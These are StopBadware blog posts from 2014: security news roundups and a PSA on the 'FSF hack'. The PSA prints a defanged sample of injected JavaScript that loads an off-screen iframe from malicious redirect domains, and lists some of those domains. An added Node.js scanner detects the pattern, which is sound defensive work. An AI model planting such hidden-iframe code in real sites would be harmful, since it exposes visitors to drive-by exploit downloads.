Community news and analysis: November 2014

Posted on December 12, 2014 - 13:49 by ccondon

Featured news

New open source Google tool tests web security scanners. Dubbed ‘Firing Range,’ the tool functions as a test ground for automated scanners and will help verify the detection capabilities of security tools. Details here.

Google study delves into manual account hijacking incidents: tactics used, success rates, damage done, and more.


ESET: First in-the-wild exploitation of Unicorn vulnerability affecting IE versions 3-11.

Fortinet: The rebirth of Dofoil—new malware variant marks the resurrection of an old botnet. 

Sucuri: RSS reveals malware injections.

Other security news

Sophos: Carder. su fraudster jailed for 9 years, ordered to pay $50.8 million.

Over the next few months, Chrome and Firefox are changing the way they treat certain website certificates. Specifically, SHA-1 certificates will be treated as less trustworthy. This change affects a lot of websites—see CloudFlare’s explanation here. (Google's explanation from September is here.)

Community news and analysis: September/October 2014

Posted on November 4, 2014 - 16:19 by ccondon

We’ve been extra busy at StopBadware this fall. We're organizing some cool research, we trained a fabulous new website tester (check out last week’s website PSA), and we attended a few different security conferences and meetings. Our community news roundup this week covers both September and October.

Featured news: A trio of security vulnerabilities

Shellshock: A serious security vulnerability was discovered in bash, a commonly used tool on many Unix, Linux, and Mac OS X systems. When exploited, the bug allows attackers to run arbitrary shell commands on vulnerable servers. See excellent coverage here from Automattic, SiteLock, Fortinet, and CloudFlare.

POODLE: Google researchers disclosed a vulnerability in SSLv3 that can allow an attacker to access private information from within an encrypted transaction. POODLE affects any browser or site that supports SSLv3. Sites using this version of SSL should upgrade to a newer version of TLS. See our partners’ coverage of POODLE: Google, Mozilla, Qualys, and Fortinet.

Highly critical security vulnerability in Drupal: We can't stress this one enough. On October 15, the Drupal team released a highly critical security advisory about a SQL injection vulnerability in the Drupal core. On October 29, Drupal published a follow-up PSA stating that automated attacks began compromising vulnerable Drupal sites as soon as the initial security advisory was released, and webmasters should assume every Drupal 7 website was compromised unless updated within seven hours of when Drupal disclosed the security flaw on October 15. Sophos and Sucuri have more details.

Malware news and analysis

ESET: Two recently patched Adobe Flash exploits now used in exploit kits, an excellent technical paper on bootkits (PDF via Virus Bulletin), another great paper on the evolution of webinject, and details on August BlackEnergy PowerPoint campaigns.

Fortinet: A look at the crypto in Android’s Emmental malware (see also Axelle Apvrille’s post on how to undermine the malware and redirect intercepted messages), a new variant of third-generation Pushdo malware, and the evolution of Tinba malware.

Sophos: A resurgence in VBA malware, what you need to know about the Sandworm zero-day malware, and a (Down Under) speed camera phish that leads to CryptoLocker-esque ransomware.

Sucuri: Manipulating WordPress plugin functions to inject malware, WordPress websites still being hacked via MailPoet plugin vulnerability, CMD process contributing to reinfection on Microsoft IIS servers.

Other security news

Google on strengthening two-step verification with Security Key: “Security Key is a physical USB second factor that only works after verifying the login site is truly a Google website.”

Mozilla on implementing a faster Content Security Policy, and why using CSP improves security for those building new websites.

'Free Software Foundation' hack

Posted on October 31, 2014 - 11:30 by ccondon

Happy Halloween, everyone! This is a PSA from the StopBadware website testing team. Our testers have recently been seeing dozens of sites hacked with a malicious iframe that loads content from very bad places. We're referring to this as the FSF hack.

Here is an example of the (sanitized) bad code:

/* Copyright (C) 2007 Free Software Foundation, Inc. hxxp://fsf. org/ */
function JeckPostal() {
    var q = navigator.userAgent;
    var b = (q.indexOf("Chrome") > -1 || q.indexOf("Android") > -1 || q.indexOf("Macintosh") > -1 || q.indexOf("Linux") > -1 || q.indexOf("IEMobile") > -1 || q.indexOf("FreeBSD") > -1 || q.indexOf("iPhone") > -1 || q.indexOf("iPad") > -1);
    if (!b) {
        document.write('<ifram'+'e src="hxxp://faskarao. arawat. com/welcometo15. html" style="position:absolute;left: -700px;top: -700px;" height="132" width="132"></ifr'+'ame>');
    }
}
JeckPostal(); /*

What does it do? This creates an off-screen iframe that loads content from a site which is usually a redirect to an exploit. The site from which the content is being loaded often has randomly generated hex strings in front of the domain. For example:

hxxp://c22c38348. bigbozz. org
hxxp://309fd22fa. aerofitstudio. net
hxxp://ed757fc56. azov-sportschool2. ru

These sites commonly redirect to maliciously registered pages which attempt to download something onto the user's PC.

Where is it found? This is typically injected at the beginning of JavaScript files loaded into your HTML. It will usually be before any other type of copyright information, and is nearly always preceded by the "2007 Free Software Foundation" comment. 
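As an added example (not code from this post or from RedLeg's writeup), the following Node.js script turns the indicators described above into a simple scanner a site owner can run over their own JavaScript files: the 2007 Free Software Foundation comment at the top of the file, a document.write() of a split 'ifram'+'e' tag, and off-screen absolute positioning. The sample file contents and the hostname in it are constructed, not taken from a real infection.

```javascript
// Heuristic scanner for the "FSF hack" injection pattern (added example, not from the post).
const FSF_COMMENT = /Copyright \(C\) 2007 Free Software Foundation, Inc\./;
const SPLIT_IFRAME = /['"]<ifram['"]\s*\+\s*['"]e/i;          // '<ifram'+'e' evasion
const DOC_WRITE = /document\.write\s*\(/;
const OFFSCREEN = /position\s*:\s*absolute\s*;\s*left\s*:\s*-\d+px\s*;\s*top\s*:\s*-\d+px/i;
const SRC_ATTR = /src=["']([^"']+)["']/i;

function scanForFsfInjection(source) {
  // The injection sits at the very start of the file, ahead of any legitimate
  // copyright header, so only the leading portion needs to be examined.
  const head = source.slice(0, 4096);
  const indicators = {
    fsfComment: FSF_COMMENT.test(head),
    splitIframeTag: SPLIT_IFRAME.test(head),
    documentWrite: DOC_WRITE.test(head),
    offscreenStyle: OFFSCREEN.test(head),
  };
  const score = Object.values(indicators).filter(Boolean).length;
  // Extract the iframe's host so the owner can see where the hidden frame points.
  const m = head.match(SRC_ATTR);
  let iframeHost = null;
  if (m) {
    try {
      iframeHost = new URL(m[1].replace(/^hxxp/i, 'http')).hostname; // undo hxxp defanging
    } catch (e) {
      iframeHost = m[1];
    }
  }
  return { infected: score >= 3, score, indicators, iframeHost };
}

// Constructed sample: the injected snippet placed before a real-looking library header.
// The hostname is a placeholder in the reserved .invalid TLD.
const INJECTED_SAMPLE =
  "/* Copyright (C) 2007 Free Software Foundation, Inc. hxxp://fsf.org/ */ " +
  "function JeckPostal(){var q=navigator.userAgent;if(!(q.indexOf('Chrome')>-1)){" +
  "document.write('<ifram'+'e src=\"hxxp://c22c38348.example.invalid/welcometo15.html\" " +
  "style=\"position:absolute;left: -700px;top: -700px;\" height=\"132\" width=\"132\"></ifr'+'ame>');}}" +
  "JeckPostal(); /*\n/* jQuery v1.11 | (c) jQuery Foundation */ (function(){})();";

// Constructed clean sample for comparison.
const CLEAN_SAMPLE = "/* jQuery v1.11 | (c) jQuery Foundation */ (function(){})();";

console.log(scanForFsfInjection(INJECTED_SAMPLE));
console.log(scanForFsfInjection(CLEAN_SAMPLE));
```

To check a whole site, read each .js file with fs.readFileSync and pass its contents to scanForFsfInjection; a score of 3 or more warrants a manual look at the first few lines of that file.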

RedLeg, one of our community forum mods, has a fantastic, very detailed writeup of this hack. If your site is hacked, take a look at RedLeg's info, our tutorials, and these resources to help you clean up!

Thanks to our superstar testing intern Blake for the tip on this one!